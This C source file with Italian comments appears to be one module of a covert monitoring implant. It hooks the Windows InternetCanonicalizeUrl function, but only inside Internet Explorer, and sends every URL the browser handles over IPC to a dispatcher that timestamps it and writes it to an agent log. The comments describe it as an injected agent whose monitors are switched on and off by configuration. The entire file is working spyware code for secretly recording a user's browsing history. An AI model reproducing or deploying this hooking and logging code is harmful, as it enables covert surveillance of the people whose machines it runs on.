#include <time.h>
#define MAXURLLEN 256
BOOL bPM_UrlLogStarted = FALSE; // Flag che indica se il monitor e' attivo o meno

typedef struct {
	COMMONDATA;
} InternetCanonicalizeUrlStruct;
InternetCanonicalizeUrlStruct InternetCanonicalizeUrlData;

typedef struct {
	char szUrlName[MAXURLLEN];
} IPCUrlStruct;

// -- Wrapper InternetCanonicalizeUrlW
static DWORD _stdcall PM_InternetCanonicalizeUrl(DWORD ARG1,
									             DWORD ARG2,
									             DWORD ARG3,
									             DWORD ARG4)
{
	IPCUrlStruct IPCUrlData;
	char * pTmp = NULL;
	DWORD i,j;
	BOOL *Active;
	
	INIT_WRAPPER(InternetCanonicalizeUrlStruct);

	CALL_ORIGINAL_API(4);

	Active = (BOOL *)pData->pHM_IpcCliRead(PM_URLLOG);

	// Controlla se il monitor e' attivo e se la funzione e' andata a buon fine
	if (!Active || !(*Active) || !ret_code)
		return ret_code;
	
	pTmp = (char *)ARG2;
	
	if( !pTmp || !((DWORD)pData->pHM_IpcCliWrite))
		return ret_code;

	// Unicode
	if (pTmp[1]==0) {
		for (i=0, j=0; i<(MAXURLLEN-1); i++, j+=2) {
			IPCUrlData.szUrlName[i] = pTmp[j];
			if (IPCUrlData.szUrlName[i] == 0)
				break;
		}
	} else { // Ascii
		for (i=0, j=0; i<(MAXURLLEN-1); i++, j++) {
			IPCUrlData.szUrlName[i] = pTmp[j];
			if (IPCUrlData.szUrlName[i] == 0)
				break;
		}
	}

	// Forza la terminazione
	IPCUrlData.szUrlName[i] = 0;
  
	pData->pHM_IpcCliWrite(PM_URLLOG, (BYTE *)&IPCUrlData, sizeof(IPCUrlStruct), 0);

	return ret_code;
}


static DWORD PM_InternetCanonicalizeUrl_setup(HMServiceStruct * pData)
{
	char proc_path[DLLNAMELEN];
	char *proc_name;
	HMODULE hMod;

	// Verifica autonomamente se si tratta del processo skype
	ZeroMemory(proc_path, sizeof(proc_path));
	GetModuleFileName(NULL, proc_path, sizeof(proc_path)-1);
	proc_name = strrchr(proc_path, '\\');
	if (proc_name) {
		proc_name++;
		if (stricmp(proc_name, "iexplore.exe") && stricmp(proc_name, "iexplorer.exe"))
			return 1; // Hooka solo internet explorer
	} else
		return 1;

	InternetCanonicalizeUrlData.pHM_IpcCliRead = pData->pHM_IpcCliRead;
	InternetCanonicalizeUrlData.pHM_IpcCliWrite = pData->pHM_IpcCliWrite;
	InternetCanonicalizeUrlData.dwHookLen = 900;
	return 0;	
}


DWORD __stdcall PM_UrlLogDispatch(BYTE * msg, DWORD dwLen, DWORD dwFlags, FILETIME *dummy)
{
	char buffer[MAXURLLEN*2]; // Lascia spazio per l'url e il time stamp
	time_t aclock;
	char *time_stamp;

	// Se il monitor e' stoppato non esegue la funzione di dispatch
	// Il controllo e' ridondante perche', se il monitor e' stoppato,
	// l'agent iniettato non inserisce i messaggi nella coda IPC
	if (!bPM_UrlLogStarted)
		return 0;

	time( &aclock );                 
	// XXX Potrebbe esserci una race su un altra chiamata a asctime
	// ma male che vada becchiamo un \n in piu' nella stringa...
	time_stamp = asctime(localtime(&aclock));
	time_stamp[24] = 0; // Toglie lo \n
	_snprintf_s(buffer, sizeof(buffer), _TRUNCATE, "[%s]\r\n%s\r\n\r\n", time_stamp, ((IPCUrlStruct *) msg)->szUrlName);
	LOG_ReportLog(PM_URLLOG, (BYTE *)buffer, strlen(buffer));
	return 1;
}


DWORD __stdcall PM_UrlLogStartStop(BOOL bStartFlag)
{
	// Se l'agent e' gia' nella condizione desiderata
	// non fa nulla.
	if (bPM_UrlLogStarted == bStartFlag)
		return 0;

	// I log va inizializzato come prima cosa...
	if (bStartFlag && !LOG_InitAgentLog(PM_URLLOG))
		return 0;

	// bStartFlag e' TRUE se il monitor deve essere attivato
	bPM_UrlLogStarted = bStartFlag;
	AM_IPCAgentStartStop(PM_URLLOG, bStartFlag);

	// ...e va chiuso come ultima
	if (!bStartFlag)
		LOG_StopAgentLog(PM_URLLOG);
		
	return 1;
}


DWORD __stdcall PM_UrlLogInit(BYTE *conf_ptr, BOOL bStartFlag)
{
	PM_UrlLogStartStop(bStartFlag);
	return 1;
}


void PM_UrlLogRegister()
{
	// L'hook viene registrato dalla funzione HM_InbundleHooks
	AM_MonitorRegister(PM_URLLOG, (BYTE *)PM_UrlLogDispatch, (BYTE *)PM_UrlLogStartStop, (BYTE *)PM_UrlLogInit, NULL);

	// Inizialmente i monitor devono avere una configurazione di default nel caso
	// non siano referenziati nel file di configurazione (partono comunque come stoppati).
	PM_UrlLogInit(NULL, FALSE);
}